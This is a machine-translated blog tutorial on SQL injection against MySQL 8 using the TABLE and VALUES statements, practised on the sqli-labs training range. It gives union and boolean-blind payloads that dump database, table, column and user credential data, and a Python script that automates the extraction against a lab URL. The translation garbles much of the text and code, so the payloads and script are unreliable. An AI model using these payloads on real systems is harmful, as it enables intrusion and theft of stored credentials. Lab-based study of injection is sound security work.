Mysql8 table injection (mysql8) It didn’t work out. Mysql8 table injection (mysql8 table injection) Here’s a quick recap of SQL injection for the new mysql8 feature.
0x01 MySQL8 Describes the integration of mysql 8.0.20 with ubuntu20 APT source. MySQL8 is officially 2 times faster than MySQL5.7, supports JSON, noSQL, changes to default authentication and other improvements.
1, The simplest way to build MySQL8 environment is to use docker pull image build
Mysql :8.0.21 docker run -d –name=mysql8 -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 mysql:8.0.21 1. Download vulstudy Integrated Environment: github.com/c0ny1/vulst… Sqli-lab = sqli-lab = sqli-lab = sqli-lab
# install vim sed -i s@/deb.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources Mysql > install vim /app/ sqL-connections /db-creds. Inc install vim /app/ sqL-connections /db-creds. Inc
4. Then in mysql8 containers with the following SQL statement to modify the default authentication (because mysql8.0 default authentication and 5 different) :
ALTER USER ‘root’ IDENTIFIED WITH mysql_native_password BY ‘123456’; 5. Reconfigure the database. The environment is set up.
Since MySQL 8.0.19, MySQL has introduced several new syntax features
TABLE Statement Function: Lists all contents in a TABLE
TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]] TABLE Similar to SELECT. Supports UNION UNION query, ORDER BY sort, and LIMIT clause to LIMIT the number of rows produced. Example: select mysql database: use security;
mysql> TABLE users; +—-+———-+————+ | id | username | password | +—-+———-+————+ | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob! le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dhakkan | Dumbo when | | | 14 admin4 | admin4 | + – + — — — — — — — — — – + — — — — — — — — — — — — + 13 rows in the set (0.01 SEC) plus the order by ordering or LIMIT restrictions
table users order by password; table users limit 1; Table users limit 0, 1; Table users limit 1, 1;
SELECT * from SELECT
2.TABLE does not allow arbitrary filtering of rows, that is, TABLE does not support any WHERE clause
VALUES statement VALUES statement function: Lists the VALUES of a row
VALUES row_constructor_list [ORDER BY column_designator] [LIMIT BY number]
row_constructor_list: ROW(value_list)[, ROW(value_list)][, …]
value_list: value[, value][, …]
Column_designator: Column_index VALUES displays a group of one or more rows as a table and returns a table data. ROW() returns a ROW, VALUES collates the rows from ROW() into a table, and shows an example:
mysql> TABLE emails; +—-+————————+ | id | email_id | +—-+————————+ | 1 | [email protected] | | 2 | [email protected] | | 3 | [email protected] | | 4 | [email protected] | | 5 | [email protected] | | 6 | [email protected] | | 7 | [email protected] | | 8 | [email protected] | +—-+————————+ 8 rows In the set (0.00 SEC)
mysql> VALUES ROW(1, 2, 3) UNION SELECT * FROM users; +———-+———-+————+ | column_0 | column_1 | column_2 | +———-+———-+————+ | 1 | 2 | 3 | | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob! le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dhakkan | Dumbo when | | | 14 admin4 | admin4 | + — — — — — — — — — – + — — — — — — — — — – + — — — — — — — — — — — — + 14 rows in the set (0.00 SEC)
Mysql command terminal 2. Sqli-labs Shooting range less-1
The TABLE command and VALUES command return TABLE data, which can be combined by the UNION statement. If the number of columns is incorrect, an error will be reported
TABLE users union VALUES ROW(1,2,3);
Select * from users where id=-1 union values row(1,2,3);
3. List all database names table information_schema.schemata.
Table users limit 1; Query results:
mysql> table users limit 1; +—-+———-+———-+ | id | username | password | +—-+———-+———-+ | 1 | Dumb | Dumb | + – + — — — — — — — — — – + — — — — — — — — — — + 1 row in the set (0.00 SEC) is essentially (id, username, password) and (1, ‘Dumb’, ‘Dumb’) are compared, more order from left to right, If the first column (the first tuple element) is correct, then the second column (the second tuple element) is checked. The size of the first character of the two tuples is greater than the size of the second character if the first character is equal, and so on. The result is the size of the tuple.
mysql> select ((1,”,”)<(table users limit 1)); +———————————–+ | ((1,”,”)<(table users limit 1)) | +———————————–+ | 1 | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + 1 row in the set (0.00 SEC)
mysql> select ((2,”,”)<(table users limit 1)); +———————————–+ | ((2,”,”)<(table users limit 1)) | +———————————–+ | 0 | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + 1 row in the set (0.00 SEC)
mysql> select ((1,’Du’,”)<(table users limit 1)); +————————————-+ | ((1,’Du’,”)<(table users limit 1)) | +————————————-+ | 1 | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + 1 row in the set (0.00 SEC)
mysql> select ((1,’Dum’,”)<(table users limit 1)); +————————————–+ | ((1,’Dum’,”)<(table users limit 1)) | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + | 1 | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + 1 row in the set (0.00 SEC)
mysql> select ((1,’Dumb’,”)<(table users limit 1)); +—————————————+ | ((1,’Dumb’,”)<(table users limit 1)) | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + | 1 | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + 1 row in the set (0.00 SEC)
mysql> select ((1,’Dumb’,’D’)<(table users limit 1)); +—————————————-+ | ((1,’Dumb’,’D’)<(table users limit 1)) | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + | 1 | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + 1 row in the set (0.00 SEC) Points to note 1. The next column of the current column must be a character, not a number, or the last character of the current column will not be detected!
2. It is best to replace < with <=. Using < is fine at first, but it is more intuitive to compare the previous character that results in the correct character by the last bit.
The final judgment process is as follows:
mysql> select ((1,’Dumb’,’Dumb’)<=(table users limit 1)); +——————————————–+ | ((1,’Dumb’,’Dumb’)<=(table users limit 1)) | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + | 1 | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + 1 row in the set (0.00) sec)
mysql> select ((1,’Dumb’,’Dumc’)<=(table users limit 1)); +——————————————–+ | ((1,’Dumb’,’Dumc’)<=(table users limit 1)) | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + | 0 | + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + 1 row in the set (0.00) SEC) 2. Test at SQLi-Labs Shooting range 1. To determine the number of columns, use the classic order by statement:
1′ order by 3–+ # normal 1′ order by 4–+ # Unknown column ‘4’ in ‘order ‘clause
-1′ union values row(1,2,3)–+
3. Database burst Table burst field burst data (1) Current database burst
-1′ union values row(1,database(),3)–+ 1′ and ASCII (substr((database()),1,1))=115–+ s (2 Because table cannot control the number of columns like SELECT, unless the number of columns of the same table, otherwise will not display. The schemata table contains 6 columns. The schemata table contains def as the first column
(1 ‘and’ def ‘, ‘m’, ‘ ‘, 4 and 6) < = (table information_schema. Schemata limit 1) – echo + # 1 ‘and normal (‘ def’, ‘n’, ‘ ‘, 4 and 6) < = (table Schemata limit 1)– m…… 1’ and (‘def’,’mysql’, 4,5,6)<=(table information_schema.schemata limit 1)– (‘def’,’mysqm’,’ mysqm’, 4,5,6)<=(table information_schema.schemata limit 1)–
1′ and (‘def’,’information_schema’,”,4,5,6)<=(table information_schema.schemata limit 1,1)– (‘def’,’information_schemb’,”,4,5,6)<=(table information_schema.schemata limit 1,1)–+ # The second database is information_schema…… Table information_schema.tables contains 21 columns
(1 ‘and’ def ‘, ‘security’ and ‘users’,’ ‘, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) < = (table information_schema. Tables Limit 317,1)–+ #
(1 ‘and’ def ‘, ‘security’, ’emails’,’ ‘, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) < = (table information_schema. Tables Limit 318,1)–+ # emails from the second table
(1 ‘and’ def ‘, ‘security’, ‘uagents’,’ ‘, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) < = (table information_schema. Tables Limit 319,1)–+ # uagents
(1 ‘and’ def ‘, ‘security’, ‘referers’,’ ‘, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) < = (table information_schema. Tables Limit 320,1)– referers ()– referers ()– referers ()– referers (); Columns (1) Select all columns from the information_schema.columns table (2) select all columns from the information_schema.columns table (3
(1 ‘and’ def ‘, ‘security’ and ‘users’,’ id ‘, ‘ ‘, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) < = (table Information_schema. columns limit 3306,1)–+ #users
(1 ‘and’ def ‘, ‘security’ and ‘users’ and’ password ‘, ‘ ‘, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) < = (table Information_schema. columns limit 387,1)–+ #users
(1 ‘and’ def ‘, ‘security’ and ‘users’,’ username ‘and’, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) < = (table Username (username, username, username, username, username
1 ‘and (1,’ D ‘, ‘) < = (table users limit 1) – + # 1 ‘normal and (1,’ E ‘, ‘) < = (table users limit 1) – + # errors
#table users limit 0,1 #1′ and (1,’D’)<=(table users limit 0,1)–+ (1, ‘E’, ‘) < = (table users limit 0, 1) – + # error… 1′ and (1,’Dumb’,’Dumb’)<=(table users limit 1)–+ # normal 1′ and (1,’Dumb’,’Dumb’)<=(table users limit 1)–+ Dumb Dumb
1 ‘and (8, the’ admin ‘, ‘admin’) < = (table users limit 7, 1) – + # 1 ‘and normal (8’ admin ‘, ‘admio’) < = (table users limit 7, 1) – + # errors Get the 8th record as 8 admin admin annotates the data step by step
0x05 Scripting one by one by hand seems a bit cumbersome. So I tried to write a script:
@author qwzf@desc SQL injection @date 2021/02/18 “” import requests import string
Url = “http://121.41.231.75:8002/Less-8/? id=’ chars=string.ascii_letters+string.digits+”@{}_-?”
Def current_db(url): print(” use mysql8 new feature or ordinary Boolean blind note: n1. Print (“,end= “) num = int(input()) if num == 1: Payload = “-1′ union values row(1,database(),3)–+” urls =urls + r = requests. Get (urls =urls) print(r.text) else: Substr ((database()),{0},1))={1}– char=” for j in chars: payloads = payload.format(i,ord(j)) urls = url + payloads r = requests.get(url=urls) if “You are in” in r.text: name += j print(name) char = j break if char == ”: break
def str2hex(name): res = ” for i in name: res += hex(ord(i)) res = ‘0x’ + res.replace(‘0x’,”) return res
Def DBS (url): def DBS (url): def DBS (url): def DBS (url): def DBS (url): def DBS (url): Print (” int(input())-1 num = STR (x) if x < 0: int(input())-1 num = STR (x) if x < 0: Break payload = “1 “and (‘def’,{},”,4,5,6)>(table information_schema.schemata limit “+num+”,1)–+” name =” for I in Range (1,20): hexchar = “for char in range(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if ‘You are in’ in r.text: name += chr(char-1) print(name) break
def tables_n(url,database): # no column name bb critical data table rows starting (modified) content = “1” and (‘ def ‘, ‘” + database + “‘, ‘, ‘ ‘, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) < (table Information_schema. tables limit {},1)–+” for I in range(0,10000): payloads = payload.format(i) urls = url + payloads r = requests.get(url=urls) if ‘You are in’ in r.text: char = chr(ord(database[-1])+1) database = database[0:-1]+char payld = “1′ and (‘ def ‘, ‘” + database + “‘, ‘, ‘ ‘, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) < (table information_schema. Tables limit “+str(i)+”,1)–+” urls = url + payld res = requests.get(url=urls) #print(i) if ‘You are in’ not in res.text: Print (‘ from the first, I, ‘line critical data table) # judge start line number n = I break return n
Def tables(url,database,n): def tables(url,database,n): Print (” print “,end= “) x = int(input())-1 num = STR (x + n) if x < 0: Break content = “1” and (‘ def ‘, ‘” + database + “‘, {}, ‘ ‘, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) > (table Information_schema. tables limit “+num+”,1)–+” name = “for I in range(1,20): hexchar =” for char in range(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if ‘You are in’ in r.text: name += chr(char-1) print(name) break
def columns_n(url,database,table): Payload = “1′ and (‘ def ‘, ‘” + database + “‘, ‘” + table + “‘, ‘ ‘, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) < (table information_schema. The columns Limit {},1)–+” for I in range(3000,10000): payloads = payload.format(i) urls = url + payloads r = requests.get(url=urls) if ‘You are in’ in r.text: char = chr(ord(table[-1])+1) table = table[0:-1]+char payld = “1′ and (‘ def ‘, ‘” + database + “‘, ‘” + table + “‘, ‘ ‘, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) < (table information_schema. The columns limit “+str(i)+”,1)–+” urls = url + payld res = requests.get(url=urls) #print(i) if ‘You are in’ not in res.text: Print (‘ from the first, I, ‘line explosion field’) # judge start line number n = I break return n
Def columns(url,database,table,n): def columns(url,database,table,n) Print (” print “,end= “) x = int(input())-1 num = STR (x + n) if x < 0: Break content = “1 ‘and’ def ‘, ‘” + database +”‘, ‘” + table + “‘, {}, ‘ ‘, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) > (table Columns limit “+num+”,1)–+” name = “for I in range(1,20): hexchar = ” for char in range(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if ‘You are in’ in r.text: name += chr(char-1) print(name) break
Def datas(url,table): def datas(url,table): def datas(url,table): def datas(url,table): def datas(url,table): Print (” print “,end= “) x = int(input()) y = x-1 num = STR (y) if y < 0: print(” print “) y = x-1 num = STR (y) if y < 0: (break content = “1” and “+ STR (x) +”, {}, ‘ ‘) > (table table “+ +” limit “+ num +”, 1) – + “name =” ‘for I in range (1, 20) : hexchar = ” for char in range(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if ‘You are in’ in r.text: name += chr(char-1) print(name) break
If name == “main”: while True: print(” Please enter what to do: \n1. Burst current database \n2. Burst table start row number \n3. Burst table \n4. Types = int(input()) if types == 1: current_db(url) elif types == 2 or types == 3: If types == 2: tables_n(url,database) elif types == 3: N = int(input()) tables(URL,database,n) elif types == 4 or types == 5: Print (print(print(print(print(print(print(print(print(print(print))) table = input() if types == 4: columns_n(url,database,table) elif types == 5: Print (” “,end= “) n = int(input()) columns(URL,database,table,n) elif types == 6: Print (” please input datas(url,table) else: DBS (url) print(” please input datas(url,table)